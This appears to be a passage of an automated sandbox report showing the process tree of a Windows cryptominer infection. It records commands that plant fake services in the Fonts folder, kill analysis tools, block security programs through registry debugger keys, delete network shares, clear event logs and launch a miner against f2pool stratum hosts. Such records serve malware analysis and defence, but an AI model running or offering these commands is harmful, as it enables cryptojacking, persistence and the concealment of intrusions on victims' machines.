PID:1168

C:\Windows\SysWOW64\sc.exe
sc delete MicrosotMais
2⤵
- Launches sc.exe
PID:1436

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /t /im dl1hots.exe
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:832

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /t /im d1lhots.exe
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1544

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /t /im rundlls.exe
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:972

C:\Windows\SysWOW64\net.exe
net user mm123$ /del
2⤵
PID:384

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 user mm123$ /del
3⤵
PID:772

C:\Windows\SysWOW64\net1.exe
net1 user mm123$ /del
2⤵
PID:1412

C:\Windows\SysWOW64\net.exe
net stop mssecsvc2.0
2⤵
PID:604

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop mssecsvc2.0
3⤵
PID:696

C:\Windows\SysWOW64\sc.exe
sc delete mssecsvc2.0
2⤵
- Launches sc.exe
PID:688

C:\Windows\SysWOW64\net.exe
net stop mssecsvc2.1
2⤵
PID:272

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop mssecsvc2.1
3⤵
PID:1984

C:\Windows\SysWOW64\sc.exe
sc delete mssecsvc2.1
2⤵
- Launches sc.exe
PID:904

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe install MetPipAtcivator c:\windows\Fonts\conhost.exe
2⤵
- Executes dropped EXE
PID:328

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe set MetPipAtcivator DisplayName Network Location Service
2⤵
- Executes dropped EXE
PID:268

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe set MetPipAtcivator Description Provides performance library information from Windows Management.
2⤵
- Executes dropped EXE
PID:2044

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe start MetPipAtcivator
2⤵
- Executes dropped EXE
PID:1392

C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Windows\TEMP\csonhost.bat
2⤵
PID:1216

C:\Windows\SysWOW64\reg.exe
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rundlls.exe" /f
3⤵
PID:632

C:\Windows\SysWOW64\PING.EXE
ping 127.1 -n 5
3⤵
- Runs ping.exe
PID:2020

C:\Windows\SysWOW64\sc.exe
sc start MetPipAtcivator
3⤵
- Launches sc.exe
PID:2676

C:\Windows\SysWOW64\sc.exe
sc start MetPipAtcivator
3⤵
- Launches sc.exe
PID:2688

C:\Windows\SysWOW64\net.exe
net share iPC$ /delete
3⤵
PID:2700

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 share iPC$ /delete
4⤵
PID:2708

C:\Windows\SysWOW64\net.exe
net share admin$ /delete
3⤵
PID:2728

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 share admin$ /delete
4⤵
PID:2736

C:\Windows\SysWOW64\net.exe
net share c$ /delete
3⤵
PID:2760

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 share c$ /delete
4⤵
PID:2768

C:\Windows\SysWOW64\net.exe
net share d$ /delete
3⤵
PID:2788

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 share d$ /delete
4⤵
PID:2796

C:\Windows\SysWOW64\net.exe
net share e$ /delete
3⤵
PID:2820

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 share e$ /delete
4⤵
PID:2828

C:\Windows\SysWOW64\net.exe
net share f$ /delete
3⤵
PID:2848

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 share f$ /delete
4⤵
PID:2856

C:\Windows\SysWOW64\net.exe
net stop lanmanserver /y
3⤵
PID:2880

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop lanmanserver /y
4⤵
PID:2888

C:\Windows\SysWOW64\sc.exe
sc config lanmanserver start= DISABLED
3⤵
- Launches sc.exe
PID:2176

C:\Windows\SysWOW64\sc.exe
sc start PolicyAgent
3⤵
- Launches sc.exe
PID:2168

C:\Windows\SysWOW64\sc.exe
sc config PolicyAgent start= AUTO
3⤵
- Launches sc.exe
PID:2224

C:\Windows\SysWOW64\sc.exe
sc stop Graphipcs_PerfSvcs
3⤵
- Launches sc.exe
PID:2248

C:\Windows\SysWOW64\sc.exe
sc delete Graphipcs_PerfSvcs
3⤵
- Launches sc.exe
PID:2144

C:\Windows\SysWOW64\Wbem\WMIC.exe
wmic process where "name='svchost.exe' and ExecutablePath='C:\\windows\\svchost.exe'" call Terminate
3⤵
- Kills process with WMI
- Suspicious use of AdjustPrivilegeToken
PID:2304

C:\Windows\SysWOW64\attrib.exe
attrib +s +h +r C:\Windows\svchost.exe
3⤵
- Sets file to hidden
- Drops file in Windows directory
PID:2272

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:2328

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\svchost.exe /d everyone
3⤵
PID:2340

C:\Windows\SysWOW64\sc.exe
sc stop conhost
3⤵
- Launches sc.exe
PID:2324

C:\Windows\SysWOW64\sc.exe
sc delete conhost
3⤵
- Launches sc.exe
PID:2276

C:\Windows\SysWOW64\Wbem\WMIC.exe
wmic process where "name='conhost.exe' and ExecutablePath='C:\\Windows\\SysWOW64\\conhost.exe'" call Terminate
3⤵
- Kills process with WMI
- Suspicious use of AdjustPrivilegeToken
PID:2240

C:\Windows\SysWOW64\takeown.exe
takeown /f C:\Windows\SysWOW64\conhost.exe /a
3⤵
- Modifies file permissions
PID:2392

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:2396

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\conhost.exe /d everyone
3⤵
PID:2132

C:\Windows\SysWOW64\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ftp.exe" /v "debugger" /d C:\\WINDOWS\\system32\\svchost.exe /f
3⤵
- Sets file execution options in registry
PID:900

C:\Windows\SysWOW64\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ftp.exe" /v "debugger" /d taskkill.exe /f
3⤵
- Sets file execution options in registry
PID:2408

C:\Windows\SysWOW64\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\certutil.exe" /v "debugger" /d taskkill.exe /f
3⤵
- Sets file execution options in registry
PID:2428

C:\Windows\SysWOW64\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mshta.exe" /v "debugger" /d taskkill.exe /f
3⤵
- Sets file execution options in registry
PID:2060

C:\Windows\SysWOW64\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SRDSL.exe" /v "debugger" /d taskkill.exe /f
3⤵
- Sets file execution options in registry
PID:2444

C:\Windows\SysWOW64\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\curl.exe" /v "debugger" /d taskkill.exe /f
3⤵
- Sets file execution options in registry
PID:1968

C:\Windows\SysWOW64\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\HipsDaemon.exe" /v "debugger" /d taskkill.exe /f
3⤵
- Sets file execution options in registry
PID:2448

C:\Windows\SysWOW64\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\usysdiag.exe" /v "debugger" /d taskkill.exe /f
3⤵
- Sets file execution options in registry
PID:2468

C:\Windows\SysWOW64\sc.exe
sc start PolicyAgent
3⤵
- Launches sc.exe
PID:2500

C:\Windows\SysWOW64\sc.exe
sc config PolicyAgent start= AUTO
3⤵
- Launches sc.exe
PID:2440

C:\Windows\SysWOW64\netsh.exe
netsh ipsec static del all
3⤵
PID:2540

C:\Windows\SysWOW64\netsh.exe
netsh ipsec static add policy name=Aliyun
3⤵
PID:2632

C:\Windows\SysWOW64\netsh.exe
netsh ipsec static add filterlist name=Allowlist
3⤵
PID:804

C:\Windows\SysWOW64\netsh.exe
netsh ipsec static add filterlist name=denylist
3⤵
PID:2696

C:\Windows\SysWOW64\netsh.exe
netsh ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=135
3⤵
PID:2772

C:\Windows\SysWOW64\netsh.exe
netsh ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=137
3⤵
PID:2808

C:\Windows\SysWOW64\netsh.exe
netsh ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=138
3⤵
PID:2916

C:\Windows\SysWOW64\netsh.exe
netsh ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=139
3⤵
PID:2964

C:\Windows\SysWOW64\netsh.exe
netsh ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=445
3⤵
PID:2988

C:\Windows\SysWOW64\netsh.exe
netsh ipsec static add filteraction name=Allow action=permit
3⤵
PID:3016

C:\Windows\SysWOW64\netsh.exe
netsh ipsec static add filteraction name=deny action=block
3⤵
PID:3036

C:\Windows\SysWOW64\netsh.exe
netsh ipsec static add rule name=deny1 policy=Aliyun filterlist=denylist filteraction=deny
3⤵
PID:3064

C:\Windows\SysWOW64\netsh.exe
netsh ipsec static set policy name=Aliyun assign=y
3⤵
PID:1904

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /t /im lsars.exe /im lsacs.exe
3⤵
- Kills process with taskkill
PID:328

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /t /im sqlservr.exe
3⤵
- Kills process with taskkill
PID:1588

C:\Windows\SysWOW64\Wbem\WMIC.exe
wmic process where "name='sqlservr.exe' and ExecutablePath='C:\\Windows\\Fonts\\sqlservr.exe'" call Terminate
3⤵
- Kills process with WMI
PID:1172

C:\Windows\SysWOW64\attrib.exe
attrib +s +h +r C:\Windows\Fonts\sqlservr.exe
3⤵
- Sets file to hidden
- Drops file in Windows directory
PID:1608

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:1808

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\Fonts\sqlservr.exe /d everyone
3⤵
PID:1296

C:\Windows\SysWOW64\attrib.exe
attrib +s +h +r C:\Windows\Fonts\csrss.exe
3⤵
- Sets file to hidden
- Drops file in Windows directory
- Views/modifies file attributes
PID:2108

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:1692

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\Fonts\csrss.exe /d everyone
3⤵
PID:2032

C:\Windows\SysWOW64\Wbem\WMIC.exe
wmic process where "name='csrss.exe' and ExecutablePath='C:\\Windows\\Fonts\\csrss.exe'" call Terminate
3⤵
- Kills process with WMI
PID:892

C:\Windows\SysWOW64\attrib.exe
attrib +s +h +r C:\Windows\lsass.exe
3⤵
- Sets file to hidden
- Drops file in Windows directory
PID:1108

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:2092

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\lsass.exe /d everyone
3⤵
PID:1288

C:\Windows\SysWOW64\sc.exe
sc stop "Application Layre Gateway Saervice"
3⤵
- Launches sc.exe
PID:832

C:\Windows\SysWOW64\sc.exe
sc delete "Application Layre Gateway Saervice"
3⤵
- Launches sc.exe
PID:864

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /t /im boy.exe
3⤵
- Kills process with taskkill
PID:1260

C:\Windows\SysWOW64\attrib.exe
attrib +s +h +r C:\Windows\boy.exe
3⤵
- Sets file to hidden
PID:384

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:776

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\boy.exe /d everyone
3⤵
PID:1960

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /t /im powershell.exe
3⤵
- Kills process with taskkill
PID:1204

C:\Windows\SysWOW64\takeown.exe
takeown /f C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe /a
3⤵
- Modifies file permissions
PID:1756

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:1072

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe /g Administrators:f
3⤵
PID:1412

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:2028

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe /e /g Users:r
3⤵
PID:2148

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:2896

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe /e /g Administrators:r
3⤵
PID:2884

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:2200

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe /e /d SERVICE
3⤵
PID:2216

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
3⤵
PID:2160

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe /e /d "network service"
3⤵
PID:2192

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:2312

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe /e /d system
3⤵
PID:2188

C:\Windows\SysWOW64\takeown.exe
takeown /f C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /a
3⤵
- Modifies file permissions
PID:2084

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:2256

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /g Administrators:f
3⤵
PID:2120

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:2228

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /e /g Users:r
3⤵
PID:2288

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:2292

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /e /g Administrators:r
3⤵
PID:2304

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:2336

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /e /d SERVICE
3⤵
PID:2344

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
3⤵
PID:2308

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /e /d "network service"
3⤵
PID:2324

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:2276

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /e /d system
3⤵
PID:2156

C:\Windows\SysWOW64\takeown.exe
takeown /f C:\Windows\system32\sethc.exe /a
3⤵
- Modifies file permissions
PID:2364

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:2240

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\sethc.exe /g Administrators:f
3⤵
PID:2404

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:588

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\sethc.exe /e /g Users:r
3⤵
PID:2416

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:900

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\sethc.exe /e /g Administrators:r
3⤵
PID:2408

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:2044

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\sethc.exe /e /d SERVICE
3⤵
PID:2068

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
3⤵
PID:1968

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\sethc.exe /e /d "network service"
3⤵
PID:2448

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo y"
3⤵
PID:2464

C:\Windows\SysWOW64\cacls.exe
cacls C:\Windows\system32\sethc.exe /e /g system:r
3⤵
PID:2500

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /t /im wscript.exe
3⤵
- Kills process with taskkill
PID:2440

C:\Windows\SysWOW64\wevtutil.exe
wevtutil cl "windows powershell"
3⤵
- Clears Windows event logs
PID:2616

C:\Windows\SysWOW64\wevtutil.exe
wevtutil cl "security"
3⤵
- Clears Windows event logs
PID:2664

C:\Windows\SysWOW64\wevtutil.exe
wevtutil cl "system"
3⤵
- Clears Windows event logs
PID:2640

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe start MetPipAtcivator
2⤵
- Executes dropped EXE
PID:392

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\tem.vbs"
2⤵
- Deletes itself
PID:840

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe
1⤵
- Executes dropped EXE
PID:1640

\??\c:\windows\Fonts\conhost.exe
"c:\windows\Fonts\conhost.exe"
2⤵
- Executes dropped EXE
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:1796

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib -s -h -r -a %SystemRoot%\Fonts
3⤵
PID:1108

C:\Windows\SysWOW64\attrib.exe
attrib -s -h -r -a C:\Windows\Fonts
4⤵
PID:996

C:\Windows\SysWOW64\cmd.exe
cmd /c taskkill /im taskmgr.exe /f /T
3⤵
PID:1984

C:\Windows\SysWOW64\taskkill.exe
taskkill /im taskmgr.exe /f /T
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:520

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:1280

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Views/modifies file attributes
PID:1488

C:\Windows\SysWOW64\cmd.exe
cmd /c taskkill /im rundll32.exe /f /T
3⤵
PID:580

C:\Windows\SysWOW64\taskkill.exe
taskkill /im rundll32.exe /f /T
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:940

C:\Windows\SysWOW64\cmd.exe
cmd /c taskkill /im autoruns.exe /f /T
3⤵
PID:1600

C:\Windows\SysWOW64\taskkill.exe
taskkill /im autoruns.exe /f /T
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1556

C:\Windows\SysWOW64\cmd.exe
cmd /c taskkill /im ProcessHacker.exe /f /T
3⤵
PID:2028

C:\Windows\SysWOW64\taskkill.exe
taskkill /im ProcessHacker.exe /f /T
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1412

C:\Windows\SysWOW64\cmd.exe
cmd /c taskkill /im procexp.exe /f /T
3⤵
PID:384

C:\Windows\SysWOW64\taskkill.exe
taskkill /im procexp.exe /f /T
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1960

C:\Windows\SysWOW64\cmd.exe
cmd /c taskkill /im perfmon.exe /f /T
3⤵
PID:1720

C:\Windows\SysWOW64\taskkill.exe
taskkill /im perfmon.exe /f /T
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1352

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib -s -h -r -a %SystemRoot%\Fonts
3⤵
PID:2120

C:\Windows\SysWOW64\attrib.exe
attrib -s -h -r -a C:\Windows\Fonts
4⤵
PID:2232

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe set SetPipAtcivator DisplayName WMI Performance Services
3⤵
- Executes dropped EXE
PID:2152

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe install SetPipAtcivator rundlls -o stratum+tcp://x.f2pool.info:1230 -u boy -k --max-cpu-usage=50 --donate-level=1 -r3 --print-time=5 --nicehash -o stratum+tcp://m.f2pool.info:1235 -u boy -k --max-cpu-usage=50 --donate-level=1 -r3 --print-time=5 --nicehash
3⤵
- Detected Stratum cryptominer command
- Executes dropped EXE
PID:2132

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe set SetPipAtcivator Description Identify computers that are connected to the network, collect and store the properties of these networks, and notify the application when they are changed.
3⤵
- Executes dropped EXE
PID:2180

\??\c:\windows\Fonts\svchost.exe
c:\windows\Fonts\svchost.exe start SetPipAtcivator
3⤵
- Executes dropped EXE
PID:2204

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:2276

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Drops file in Windows directory
- Views/modifies file attributes
PID:2336

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:2460

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Drops file in Windows directory
- Views/modifies file attributes
PID:2496

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:2548

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
PID:2572

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:2636

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Drops file in Windows directory
- Views/modifies file attributes
PID:2660

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:2904

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
PID:2928

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:2936

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Drops file in Windows directory
PID:2960

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:2968

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
PID:2992

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:3000

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
PID:3024

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:3032

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Views/modifies file attributes
PID:3056

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:3064

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Views/modifies file attributes
PID:1240

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:1388

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
PID:1160

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:1800

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Drops file in Windows directory
PID:2004

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:1360

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Drops file in Windows directory
PID:952

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:1888

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Views/modifies file attributes
PID:2096

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:1952

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Drops file in Windows directory
- Views/modifies file attributes
PID:1280

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:1956

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Views/modifies file attributes
PID:1692

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:1528

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Drops file in Windows directory
- Views/modifies file attributes
PID:1708

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:864

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Drops file in Windows directory
- Views/modifies file attributes
PID:832

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:1124

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Views/modifies file attributes
PID:1512

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:1960

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Drops file in Windows directory
PID:996

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:1428

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Drops file in Windows directory
- Views/modifies file attributes
PID:1236

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:292

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Drops file in Windows directory
- Views/modifies file attributes
PID:1804

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:2264

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
PID:2312

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:2552

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
PID:2624

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:2688

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
PID:2756

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:2828

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Views/modifies file attributes
PID:2856

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:3048

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
PID:1768

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:2004

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
PID:1424

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:1124

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Drops file in Windows directory
- Views/modifies file attributes
PID:556

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:2556

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
PID:2564

C:\Windows\SysWOW64\cmd.exe
cmd /c attrib +s +a %SystemRoot%\Fonts
3⤵
PID:2656

C:\Windows\SysWOW64\attrib.exe
attrib +s +a C:\Windows\Fonts
4⤵
- Views/modifies file attributes
PID:2676

